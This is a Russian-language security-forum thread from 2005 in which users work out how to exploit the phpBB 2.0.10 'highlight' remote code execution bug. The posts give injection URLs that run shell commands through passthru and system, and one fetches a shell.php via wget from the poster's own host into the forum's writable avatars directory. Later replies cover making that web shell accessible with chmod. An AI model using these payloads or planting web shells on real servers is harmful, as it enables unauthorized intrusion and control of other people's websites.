HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

highlight
  #1  
Старый 16.11.2005, 18:03
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
По умолчанию highlight

В общем, необходимо взломать форум phpbb 2.0.10 путём эксплуатации баги в highlight.
Мне не нужно взламывать конкретный форум, просто хочу научиться использовать эту багу.

Вот что я пробовал:
Код:
http://сайт/forum/viewtopic.php?p=337&highlight=%2527.$poster=`pwd`.%2527
Выдаёт(там где должно быть имя чела):
Код:
/pub/home/taymen30/сайт/forum
Потом пробую:
Код:
http://сайт/forum/viewtopic.php?p=337&highlight=%2527.$poster=`$cmd`.%2527&cmd=cd%20..;ls%20-l
Выдаёт:)\b#i

В чём я делаю ошибку?Может кто поможет...
 
Ответить с цитированием

  #2  
Старый 16.11.2005, 18:26
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

viewtopic.php?t=275&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).'
 
Ответить с цитированием

  #3  
Старый 16.11.2005, 20:00
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
По умолчанию

k1borg, спасибо! Ты мне помог, опираясь на твою подсказку я нашёл де-то на других форумах другой код. Но теперь возникла другая проблема. Например, делаю такой запрос:

Код:
http://форум/viewtopic.php?p=228&highlight=%2527.system($_GET[cmd]).include%2527&cmd=ls%20-l%20/usr/home/сайт/public_html/директория форума/images
Всё ОК, выдаёт все файлы. Смотрю, у директории avatars права drwxrwxrwx
Делаю запрос:

Код:
http://сайт/viewtopic.php?p=228&highlight=%2527.system($_GET[cmd]).include%2527&cmd=wget%20http://мой сайт.narod.ru/shell.php%20-P%20/usr/home/сайт/public_html/форум/images/avatars/
Затем смотрюнет ли шелла через ls- его нет ни в директории avatars нигде! =(
 
Ответить с цитированием

  #4  
Старый 17.11.2005, 00:27
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
По умолчанию

Всё, народ, справился сам...только одно не получается:я когда закачиваю шелл на форум, то у него права становятся: -rw-------

То есть открыть его я не могу. Что мне делать-то?

Нужно чтобы права стали: -rw-rw----

Закачиваю fetch'ем

Последний раз редактировалось Ван; 17.11.2005 в 00:32..
 
Ответить с цитированием

  #5  
Старый 17.11.2005, 04:04
madnet
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719

Репутация: 1384


По умолчанию

chmod 755 shell.php
__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.